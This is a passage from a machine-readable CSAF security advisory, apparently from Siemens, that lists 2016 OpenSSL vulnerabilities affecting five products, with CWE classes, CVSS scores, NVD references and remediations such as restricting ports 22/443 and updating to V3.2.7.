"https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 9.8, "baseSeverity": "CRITICAL", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-1908" }, { "cve": "CVE-2016-2105", "cwe": { "id": "CWE-190", "name": "Integer Overflow or Wraparound" }, "notes": [ { "category": "summary", "text": "Integer overflow in the EVP_EncodeUpdate function in crypto/evp/encode.c in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to cause a denial of service (heap memory corruption) via a large amount of binary data.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-2105" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.5, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-2105" }, { "cve": "CVE-2016-2106", "cwe": { "id": "CWE-190", "name": "Integer Overflow or Wraparound" }, "notes": [ { "category": "summary", "text": "Integer overflow in the EVP_EncryptUpdate function in crypto/evp/evp_enc.c in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to cause a denial of service (heap memory corruption) via a large amount of data.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-2106" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.5, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-2106" }, { "cve": "CVE-2016-2107", "cwe": { "id": "CWE-200", "name": "Exposure of Sensitive Information to an Unauthorized Actor" }, "notes": [ { "category": "summary", "text": "The AES-NI implementation in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h does not consider memory allocation during a certain padding check, which allows remote attackers to obtain sensitive cleartext information via a padding-oracle attack against an AES CBC session. NOTE: this vulnerability exists because of an incorrect fix for CVE-2013-0169.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 5.9, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-2107" }, { "cve": "CVE-2016-2108", "cwe": { "id": "CWE-119", "name": "Improper Restriction of Operations within the Bounds of a Memory Buffer" }, "notes": [ { "category": "summary", "text": "The ASN.1 implementation in OpenSSL before 1.0.1o and 1.0.2 before 1.0.2c allows remote attackers to execute arbitrary code or cause a denial of service (buffer underflow and memory corruption) via an ANY field in crafted serialized data, aka the \"negative zero\" issue.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-2108" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 9.8, "baseSeverity": "CRITICAL", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-2108" }, { "cve": "CVE-2016-2109", "cwe": { "id": "CWE-327", "name": "Use of a Broken or Risky Cryptographic Algorithm" }, "notes": [ { "category": "summary", "text": "The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in the ASN.1 BIO implementation in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to cause a denial of service (memory consumption) via a short invalid encoding.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-2109" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.5, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-2109" }, { "cve": "CVE-2016-2176", "cwe": { "id": "CWE-119", "name": "Improper Restriction of Operations within the Bounds of a Memory Buffer" }, "notes": [ { "category": "summary", "text": "The X509_NAME_oneline function in crypto/x509/x509_obj.c in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to obtain sensitive information from process stack memory or cause a denial of service (buffer over-read) via crafted EBCDIC ASN.1 data.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-2176" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 8.2, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-2176" }, { "cve": "CVE-2016-2177", "cwe": { "id": "CWE-190", "name": "Integer Overflow or Wraparound" }, "notes": [ { "category": "summary", "text": "OpenSSL through 1.0.2h incorrectly uses pointer arithmetic for heap-buffer boundary checks, which might allow remote attackers to cause a denial of service (integer overflow and application crash) or possibly have unspecified other impact by leveraging unexpected malloc behavior, related to s3_srvr.c, ssl_sess.c, and t1_lib.c.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-2177" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 9.8, "baseSeverity": "CRITICAL", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-2177" }, { "cve": "CVE-2016-2178", "cwe": { "id": "CWE-203", "name": "Observable Discrepancy" }, "notes": [ { "category": "summary", "text": "The dsa_sign_setup function in crypto/dsa/dsa_ossl.c in OpenSSL through 1.0.2h does not properly ensure the use of constant-time operations, which makes it easier for local users to discover a DSA private key via a timing side-channel attack.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-2178" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 5.5, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-2178" }, { "cve": "CVE-2016-2179", "cwe": { "id": "CWE-401", "name": "Missing Release of Memory after Effective Lifetime" }, "notes": [ { "category": "summary", "text": "The DTLS implementation in OpenSSL before 1.1.0 does not properly restrict the lifetime of queue entries associated with unused out-of-order messages, which allows remote attackers to cause a denial of service (memory consumption) by maintaining many crafted DTLS sessions simultaneously, related to d1_lib.c, statem_dtls.c, statem_lib.c, and statem_srvr.c.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-2179" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.5, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-2179" }, { "cve": "CVE-2016-2180", "cwe": { "id": "CWE-125", "name": "Out-of-bounds Read" }, "notes": [ { "category": "summary", "text": "The TS_OBJ_print_bio function in crypto/ts/ts_lib.c in the X.509 Public Key Infrastructure Time-Stamp Protocol (TSP) implementation in OpenSSL through 1.0.2h allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a crafted time-stamp file that is mishandled by the \"openssl ts\" command.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-2180" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.5, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-2180" }, { "cve": "CVE-2016-2181", "cwe": { "id": "CWE-682", "name": "Incorrect Calculation" }, "notes": [ { "category": "summary", "text": "The Anti-Replay feature in the DTLS implementation in OpenSSL before 1.1.0 mishandles early use of a new epoch number in conjunction with a large sequence number, which allows remote attackers to cause a denial of service (false-positive packet drops) via spoofed DTLS records, related to rec_layer_d1.c and ssl3_record.c.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-2181" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.5, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-2181" }, { "cve": "CVE-2016-2182", "cwe": { "id": "CWE-787", "name": "Out-of-bounds Write" }, "notes": [ { "category": "summary", "text": "The BN_bn2dec function in crypto/bn/bn_print.c in OpenSSL before 1.1.0 does not properly validate division results, which allows remote attackers to cause a denial of service (out-of-bounds write and application crash) or possibly have unspecified other impact via unknown vectors.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-2182" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], 